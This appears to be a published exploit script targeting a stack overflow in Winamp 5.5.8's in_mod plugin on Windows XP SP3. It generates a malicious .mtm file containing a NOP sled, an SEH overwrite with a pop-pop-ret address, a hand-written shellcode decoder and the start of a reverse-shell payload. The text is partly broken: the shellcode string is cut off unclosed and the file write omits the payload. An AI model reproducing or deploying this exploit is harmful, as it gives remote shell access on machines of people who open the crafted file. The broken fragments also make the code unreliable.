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Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)

# finally got time to finish what I started...
# Winamp (in_mod plugin) Stack Overflow (SEH)
# WINDOWS XP SP3 EN Fully Patched
# Bug found by
# POC and Exploit by fdisk
# This POC was already been released here (without proper shellcode):
# We later gave up on SEH and went straight for direct EIP overwrite, yesterday I couldn't sleep and decided to finish cooking this version.
# Further References:
# Special thanks to Mighty-D, Ryujin and all the Exploit-DB Dev Team.

header = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E"
header += "\x04\x0C" * 16
nopsled = "\x90" * 58331

# windows/shell_reverse_tcp LHOST= LPORT=4444 (script kiddie unfriendly)
# bad chars: \x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10\x11\x12\x13\x0a\x0b\x0c\x0d\x0e\x0f
shellcode = ("\x89\xe1\xda\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"

prepare_shellcode = "\x90" * 40
prepare_shellcode += "\x90\x33\xDB" # xor ebx,ebx
prepare_shellcode += "\x54\x5B" # push esp - pop ebx
prepare_shellcode += "\x81\xEB\x17\xCB\xFF\xFF" # sub ebx,-34E9
prepare_shellcode += "\x83\xc3\x3B" # add ebx,3B
prepare_shellcode += "\x83\xEB\x22" # sub ebx,22
prepare_shellcode += "\x80\x2B\xDA" # sub byte ptr ds:[ebx],0da
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xDA" # sub byte ptr ds:[ebx],0da
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x90" * 6
prepare_shellcode += "\x80\x2B\xC2" # sub byte ptr ds:[ebx],0c2
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xBE" # sub byte ptr ds:[ebx],0be
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xC1" # sub byte ptr ds:[ebx],0c1
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xBF" # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xC8" # sub byte ptr ds:[ebx],0c8
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xB9" # sub byte ptr ds:[ebx],0B9
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x90" * 4
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xCA" # sub byte ptr ds:[ebx],0CA
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xD9" # sub byte ptr ds:[ebx],0D9
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xB7" # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xB9" # sub byte ptr ds:[ebx],0B9
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xC1" # sub byte ptr ds:[ebx],0c1
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xBF" # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "\x90" * 4
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xBC" # sub byte ptr ds:[ebx],0BC
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xD6" # sub byte ptr ds:[ebx],0D6
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xCA" # sub byte ptr ds:[ebx],0CA
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xDA" # sub byte ptr ds:[ebx],0da
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xC4" # sub byte ptr ds:[ebx],0c4
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x90" * 4
prepare_shellcode += "\x80\x2B\xB6" # sub byte ptr ds:[ebx],0B6
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xC4" # sub byte ptr ds:[ebx],0c4
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xBB" # sub byte ptr ds:[ebx],0BB
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xB7" # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xD3" # sub byte ptr ds:[ebx],0D3
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x90" * 6
prepare_shellcode += "\x80\x2B\xBB" # sub byte ptr ds:[ebx],0BB
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xD8" # sub byte ptr ds:[ebx],0D8
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xB7" # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xD4" # sub byte ptr ds:[ebx],0d4
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xBC" # sub byte ptr ds:[ebx],0BC
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xB4" # sub byte ptr ds:[ebx],0B4
prepare_shellcode += "\x90" * 6
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xBF" # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xD5" # sub byte ptr ds:[ebx],0D5
prepare_shellcode += "\x83\xc3\x3F" # add ebx,3F
prepare_shellcode += "\x83\xEB\x16" # sub ebx,16
prepare_shellcode += "\x80\x2B\xCC" # sub byte ptr ds:[ebx],0CC
prepare_shellcode += "\x43" # inc ebx
prepare_shellcode += "\x80\x2B\xC9" # sub byte ptr ds:[ebx],0C9
prepare_shellcode += "\x90"*305

nseh = "\xeb\x30\x90\x90"
seh = "\x3f\x28\xd1\x72" # 0x72D1283F - ppr - msacm32.drv - Windows XP SP3 EN
payload = header + nopsled + nseh + seh + prepare_shellcode + shellcode + "\x90" * 100

file = open("sploit.mtm", "w")

print "sploit.mtm file generated successfuly"

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